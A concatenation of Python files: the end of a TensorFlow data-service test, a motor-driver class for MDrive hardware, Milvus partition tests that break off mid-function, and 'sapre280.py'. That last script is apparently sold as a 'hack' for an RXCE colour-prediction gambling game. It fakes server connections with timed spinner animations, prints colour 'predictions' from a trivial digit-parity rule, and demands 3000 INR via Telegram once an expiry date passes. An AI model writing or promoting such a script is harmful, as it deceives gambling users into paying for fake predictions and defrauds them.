cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
# Read halfway through the dataset.
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.add_worker()
# Wait for the new worker to register with the dispatcher.
while cluster.num_registered_workers() < 2:
time.sleep(10 / 1000) # 10ms
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(2 * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(use_same_port=[True, False]),
data_service_test_base.all_cluster_configurations()))
def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
# Read halfway through the dataset.
midpoint = num_elements // 2
for i in range(midpoint):
self.assertEqual(i, next(iterator).numpy())
# Stop the original worker and start a new one.
cluster.workers[0].restart(use_same_port=use_same_port)
# There may have been some elements prefetched from the first worker
# before it was stopped.
while True:
val = next(iterator).numpy()
if val == 0:
break
# The dataset starts over now that we read from the new worker.
# TODO(b/157086991): Iterate until end of sequence when we support
# detecting lost workers.
for i in range(1, num_elements // 2):
val = next(iterator).numpy()
self.assertEqual(i, val)
@combinations.generate(test_base.eager_only_combinations())
def testChangeProcessingModeAfterRestart(self):
self.skipTest("b/170910141")
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
range_dataset = dataset_ops.Dataset.range(num_elements)
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.target,
job_name="test"))
iterator = iter(ds)
for i in range(num_elements // 2):
self.assertEqual(i, next(iterator).numpy())
cluster.restart_dispatcher()
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="distributed_epoch",
service=cluster.target,
job_name="test"))
with self.assertRaisesOpError("already an existing job with that name "
"using processing mode <parallel_epochs>"):
next(iter(ds)).numpy()
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(work_dir=[TMP_WORK_DIR, NO_WORK_DIR])))
def testDistributeLargeGraphThenRegisterWorker(self, work_dir):
cluster = data_service_test_base.TestCluster(
num_workers=0, work_dir=work_dir, fault_tolerant_mode=False)
# Larger than default OSS grpc message size limit of 4MB.
tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
ds = dataset_ops.Dataset.from_tensors(tensor)
ds = self.make_distributed_dataset(ds, cluster)
it = iter(ds)
cluster.add_worker()
self.assertAllEqual(next(it), tensor)
if __name__ == "__main__":
test.main()
|
sapre280.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
expirydate = datetime.date(2022, 1, 30)
#expirydate = datetime.date(2021, 12, 30)
today=date.today()
today=date.today()
green="\033[3;32m"
neon="\033[3;36m"
nc="\033[00m"
red="\033[3;31m"
purple="\033[3;34m"
yellow="\033[3;33m"
voilet="\033[3;35m"
def hero():
def chalo():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']) :
if done:
break
sys.stdout.write('\rconnecting to server for next colour--------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def chalo1():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rgetting the colour wait --------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
clear()
y=1
newperiod=period
banner='figlet RXCE8.1|lolcat '
thisway=[0,2,4,6,8,10,12,14,16,18,20]
thatway=[1,3,5,7,9,11,13,15,17,19]
numbers=[]
i=1
while(y):
clear()
system(banner)
print("Contact me on telegram @Hackmgk")
print("Enter" ,newperiod,"Price :")
current=input()
current=int(current)
chalo()
print("\n---------Successfully Connected to the server-----------")
chalo1()
print("\n---------Successfully got the colour -------------")
print('\n')
def getSum(n):
sum=0
for digit in str(n):
sum += int(digit)
return sum
if i in thisway:
m=getSum(current)
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1," : 💥🟢GREEN1🟢💥")
else:
print(newperiod+1," : 💥🔴RED2🔴💥")
else:
if current in numbers:
print(newperiod+1," : 💥🔴RED3🔴💥")
else:
print(newperiod+1," : 💥🟢GREEN4🟢💥")
if i in thatway:
m=getSum(current)+1
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1,": 💥💥🔴RED5🔴💥💥")
else:
print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
else:
if current in numbers:
print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
else:
print(newperiod+1,": 💥💥🔴RED7🔴💥💥")
i=i+1
newperiod+=1
numbers.append(current)
y=input("Do you want to play : Press 1 and 0 to exit \n")
if(y==0):
y=False
if (len(numbers)>15):
clear()
system('figlet Thank you!!')
print("Play on next specified time!!")
print("-----------Current Time UP----------")
sys.exit(" \n \n \n Contact on Telegram @Hackmgk")
print(numbers)
if(expirydate>today):
now = datetime.datetime.now()
First = now.replace(hour=10, minute=55, second=0, microsecond=0)
Firstend = now.replace(hour=11, minute=35, second=0, microsecond=0)
Second = now.replace(hour=13, minute=55, second=0, microsecond=0)
Secondend = now.replace(hour=14, minute=35, second=0, microsecond=0)
Third = now.replace(hour=16, minute=55, second=0, microsecond=0)
Thirdend = now.replace(hour=17, minute=35, second=0, microsecond=0)
Final = now.replace(hour=20, minute=55, second=0, microsecond=0)
Finalend = now.replace(hour=21, minute=35, second=0, microsecond= 0)
FFinal = now.replace(hour=22, minute=55, second=0, microsecond= 0)
FFinalend = now.replace(hour=23, minute=35, second=0, microsecond= 0)
if (now>First and now<Firstend):
period=220
hero()
elif(now>Second and now<Secondend):
period=280
hero()
elif(now>Third and now<Thirdend):
period=340
hero()
elif(now>Final and now<Finalend):
period=420
hero()
elif(now>FFinal and now<FFinalend):
period=460
hero()
else:
banner='figlet RXCE8.1|lolcat'
print("Hi!! Thanks for buying Life time the hack")
print("----------Your play time-----------")
print(" 11:00 PM- 11:35 PM")
print(" 02:00 PM- 02:35 PM")
print(" 05:00 PM- 05:35 PM")
print(" 09:00 PM- 09:35 PM")
print(" 11:00 PM- 12:35 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print(" admin on telegram @Hackmgk ")
else:
banner='figlet Thank '
system(banner)
print("*---------*----------*-------------*----------*")
print("Your hack has expired--- Please contact")
print(" on telegram ----@hackmgk for activating")
print(" Recharge Amount : Total limit " )
print(" 2. 3000 INR ------- 30 Days")
print("*---------*----------*-------------*----------*")
print("Your custom hack can be made request from us.")
print( "Msg me on telegram @hackmgk")
|
base.py | # ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Int, Bool, Float, CInt
# ============= standard library imports ========================
from threading import Thread, Event
import time
# ============= local library imports ==========================
from pychron.hardware.base_linear_drive import BaseLinearDrive
ERROR_MAP = {'6': 'An I/O is already set to this type. Applies to non-General Purpose I/O.',
'8': 'Tried to set an I/O to an incorrect I/O type.',
'9': 'Tried to write to I/O set as Input or is "TYPED".',
'10': 'Illegal I/O number.',
'11': 'Incorrect CLOCK type.',
'12': 'Illegal Trip / Capture',
'20': 'Tried to set unknown variable or flag. Trying to set an undefined variable of flag. '
'Also could be a typo.',
'21': 'Tried to set an incorrect value. Many variables have a range such as the Run Current (RC) '
'which is 1 to 100%. As an example, you cannot set the RC to 110%.',
'22': 'VI is set greater than or equal to VM. The Initial Velocity is set equal to, or higher than the '
'Maximum Velocity. VI must be less than VM.',
'23': 'VM is set less than or equal to VI. The Maximum Velocity is set equal to, or lower than the '
'Initial Velocity. VM must be greater than VI.',
'24': 'Illegal data entered. Data has been entered that the device does not understand.',
'25': 'Variable or flag is read only. Read only flags and variables cannot be set.',
'26': 'Variable or flag is not allowed to be incremented or decremented. IC and DC cannot be used on '
'variables or flags such as Baud and Version.',
'27': 'Trip not defined.Trying to enable a trip that has not yet been defined.',
'28': 'WARNING! Trying to redefine a program label or variable. This can be caused when you download '
'a program over a program already saved. Before downloading a new or edited program, type <FD> '
'and press ENTER to return the device to the Factory Defaults. '
'You may also type <CP> and press ENTER to Clear the Program.',
'29': 'Trying to redefine a built in command, variable or flag.',
'30': 'Unknown label or user variable. Trying to Call or Branch to a Label or '
'Variable that has not yet been defined.',
'31': 'Program label or user variable table is full. '
'The table has a maximum capacity of 22 labels and/or user variables.',
'32': 'Trying to set a label (LB). You cannot name a label and then try to set it to a value. '
'Example: Lable P1 (LB P1 ). The P1 cannot be used to set a variable such as P1=1000.',
'33': 'Trying to SET an Instruction.',
'34': 'Trying to Execute a Variable or Flag',
'35': 'Trying to Print Illegal Variable or Flag',
'36': 'Illegal Motor Count to Encoder Count Ratio',
'37': 'Command, Variable or Flag Not Available in Drive',
'38': 'Missing parameter separator',
'39': 'Trip on Position and Trip on Relative Distance not allowed together',
'40': 'Program not running. If HOLD (H) is entered in Immediate Mode and a program is not running.',
'41': 'Stack overflow',
'42': 'Illegal program address. Tried to Clear, List, Execute, etc. an incorrect Program address.',
'43': 'Tried to overflow program stack. Calling a Sub-Routine or Trip Routine with no Return.',
'44': 'Program locked. User Programs can be Locked with the <LK> command. Once Locked, '
'the program cannot be listed or edited in any way.',
'45': 'Trying to Overflow Program Space.',
'46': 'Not in Program Mode.',
'47': 'Tried to Write to Illegal Flash Address',
'48': 'Program Execution stopped by I/O set as Stop.',
'60': 'Not used',
'61': 'Trying to set illegal BAUD rate. The only Baud Rates accepted are those listed on the '
'Properties Page of IMS Terminal. (4,800, 9,600, 19,200, 38,400, 115,200)',
'62': 'IV already pending or IF Flag already TRUE.',
'63': 'Character over-run. Character was received. Processor did not have time to process it and it'
' was over-written by the next character.',
'64': 'Startup Calibration failed (Hybrid only)',
'70': 'FLASH Check Sum Fault',
'71': 'Internal Temperature Warning, 10C to Shutdown',
'72': 'Internal Over TEMP Fault, Disabling Drive',
'73': 'Tried to SAVE while moving',
'74': 'Tried to Initialize Parameters (IP) or Clear Program (CP) while Moving',
'75': 'Linear Overtemperature Error (For units without Internal Over Temp)',
'80': 'HOME switch not defined. Attempting to do a HOME (H) sequence but '
'the Home Switch has not yet been defined.',
'81': 'HOME type not defined. The HOME (HM or HI) Command has been programmed '
'but with no type or an illegal type. '
'(Types = 1, 2, 3, or 4)',
'82': 'Went to both LIMITS and did not find home. The motion encroached both limits '
'but did not trip the Home switch. Indicates a possible badswitch or a bad circuit.',
'83': 'Reached plus LIMIT switch. The LIMIT switch in the plus directionwas tripped.',
'84': 'Reached minus LIMIT switch. The LIMIT switch in the minus directionwas tripped.',
'85': 'MA or MR is not allowed during a HOME and a HOME is not allowed while the device is in motion.',
'86': 'Stall detected. The Stall Flag (ST) has been set to 1.',
'87': 'MDrive In Clock Mode, JOG not allowed',
'88': 'MDrive Following error',
'89': 'MDrive Reserved',
'90': 'Motion Variables are too low switching to EE=1',
'91': 'Motion stopped by I/O set as Stop.',
'92': 'Position Error in Closed loop. motor will attempt tp position the shaft within the deadband, '
'After failing 3 attempts Error 92 will be generated.Axis will continue to function normally.',
'93': 'MR or MA not allowed while correcting position at end of previous MR or MA.',
'94': 'Clear Locked Rotor Fault not allowed while in Motion. MDrive Hybrid products(MAI) only.'}
class BaseMDrive(BaseLinearDrive):
initial_velocity = CInt
acceleration = CInt
deceleration = CInt
_velocity = Int
run_current = CInt
use_encoder = Bool
steps_per_turn = CInt
turns_per_mm = Float
slew_velocity = CInt
_jitter_evt = None
def load_additional_args(self, config):
args = [
('Motion', 'steps', 'int'),
('Motion', 'min_steps', 'int'),
('Motion', 'sign'),
('Motion', 'velocity', 'int'),
('Motion', 'slew_velocity'),
('Motion', 'initial_velocity'),
('Motion', 'acceleration'),
('Motion', 'deceleration'),
('Motion', 'run_current'),
('Motion', 'use_encoder', 'boolean'),
('Motion', 'turns_per_mm'),
('Homing', 'home_delay'),
('Homing', 'home_velocity'),
('Homing', 'home_acceleration'),
('Homing', 'home_at_startup', 'boolean'),
('Homing', 'home_position'),
('Homing', 'home_limit'),
('General', 'min'),
('General', 'max'),
('General', 'nominal_position'),
('General', 'units')]
self._load_config_attributes(config, args)
self.linear_mapper_factory()
return True
def initialize(self, *args, **kw):
if super(BaseMDrive, self).initialize(*args, **kw):
self.set_use_encoder(self.use_encoder)
if self.use_encoder:
self.steps_per_turn = 2048
else:
self.steps_per_turn = 51200
for attr in ('velocity', 'initial_velocity', 'acceleration', 'deceleration', 'run_current'):
v = getattr(self, attr)
if v:
func = getattr(self, 'set_{}'.format(attr))
func(v)
return True
def is_simulation(self):
return self.simulation
def move_absolute(self, pos, velocity=None, acceleration=None, deceleration=None, block=True, units='steps'):
self.debug('move absolute pos={}, block={}, units={}'.format(pos, block, units))
self._move(pos, velocity, acceleration, deceleration, False, block, units)
return True
def move_relative(self, pos, velocity=None, acceleration=None, deceleration=None, block=True, units='steps'):
self.debug('move relative pos={}, block={}, units={}'.format(pos, block, units))
self._move(pos, velocity, acceleration, deceleration, True, block, units)
return True
def get_position(self, units='steps'):
steps = self.read_position()
self.debug('read position steps={}'.format(steps))
pos = self._convert_steps(steps, units)
self.debug('converted position= {} ({})'.format(pos, units))
return pos
def stalled(self):
if self._get_var('ST'):
self._set_var('ST', 0)
return True
def slew(self, scalar):
v = self.slew_velocity * scalar
self.set_slew(v)
return True
def stop_drive(self):
self.set_slew(0)
return True
def start_jitter(self, turns, p1, p2, velocity=None, acceleration=None, deceleration=None):
def _jitter():
kw = dict(velocity=velocity, acceleration=acceleration, deceleration=deceleration, units='turns')
while not self._jitter_evt.is_set():
self.move_relative(turns, **kw)
time.sleep(p1)
self.move_relative(-turns, **kw)
time.sleep(p2)
self._jitter_evt = Event()
t = Thread(target=_jitter)
t.setDaemon(True)
t.start()
return True
def stop_jitter(self):
if self._jitter_evt:
self._jitter_evt.set()
return True
def set_initial_velocity(self, v):
self._set_var('VI', v)
def set_velocity(self, v):
self._set_var('VM', v)
def set_acceleration(self, a):
self._set_var('A', a)
def set_deceleration(self, a):
self._set_var('D', a)
def set_slew(self, v):
self._set_var('SL', v)
def set_encoder_position(self, v):
self._set_var('P', v)
def set_use_encoder(self, b):
self._set_var('EE', '{:b}'.format(b))
def set_run_current(self, rc):
self._set_var('RC', rc)
def set_home(self):
self.set_encoder_position(0)
def moving(self):
return self._moving()
def block(self, n=3, tolerance=1, progress=None, homing=False):
self._block()
def tosteps(self, v, units='turns'):
return self._get_steps(v, units)
# private
def _convert_steps(self, v, units):
if v is not None:
if units == 'turns':
v /= float(self.steps_per_turn)
elif units == 'mm':
v /= float(self.turns_per_mm * self.steps_per_turn)
return v
def _get_steps(self, v, units):
if units == 'turns':
v = int(v * self.steps_per_turn)
elif units == 'mm':
v = int(v * self.turns_per_mm * self.steps_per_turn)
return v
def _set_motor(self, value):
self._data_position = value
relative = True
block = False
self._move(value, relative, block)
def _set_var(self, var, val, check_error=True):
if check_error:
args = self._check_error()
if args:
ecode, estr = args
self.warning('Existing error ErrorCode={}, Error={}'.format(ecode, estr))
ret = True
self.tell('{} {}'.format(var, val))
if check_error:
args = self._check_error()
if args:
ecode, estr = args
self.warning('Error setting {}={} ErrorCode={}. Error={}'.format(var, val, ecode, estr))
ret = False
return ret
def _check_error(self):
eflag = self._get_var('EF')
if eflag == 1:
ecode = str(self._get_var('ER', as_int=False)).strip()
estr = ERROR_MAP.get(ecode, 'See MCode Programming Manual')
return ecode, estr
def _get_var(self, c, as_int=True):
resp = self.ask('PR {}'.format(c))
if as_int and resp is not None:
try:
resp = int(resp)
except (TypeError, ValueError) as e:
self.debug('invalid var={} response="{}", error={}'.format(c, resp, e))
resp = None
self.info('Variable {}={}'.format(c, resp))
return resp
def _move(self, pos, velocity, acceleration, deceleration, relative, block, units):
if velocity is None:
velocity = self.initial_velocity
if acceleration is None:
acceleration = self.acceleration
if deceleration is None:
deceleration = self.deceleration
pos = self._get_steps(pos, units)
self.debug('converted steps={}'.format(pos))
def func():
self.set_initial_velocity(velocity)
self.set_acceleration(acceleration)
self.set_deceleration(deceleration)
cmd = 'MR' if relative else 'MA'
self.tell('{} {}'.format(cmd, pos))
self._block()
if block:
func()
return True
else:
t = Thread(target=func)
t.setDaemon(True)
t.start()
return True
# if block:
# self._block()
# self.info('move complete')
def _moving(self, motion_flag='MV'):
"""
0= Not Moving
1= Moving
motion flags
MP= moving to position. set after MA or MR
MV= axis in motion
"""
resp = self._get_var(motion_flag)
return resp == 1
def _block(self):
while 1:
if not self._moving():
break
time.sleep(0.1)
def _read_motor_position(self, *args, **kw):
pos = self._get_var('P')
return pos
# ============= EOF =============================================
|
test_partition.py | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_name_name_None(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_different_partition_names(self, connect, collection):
'''
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
'''
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
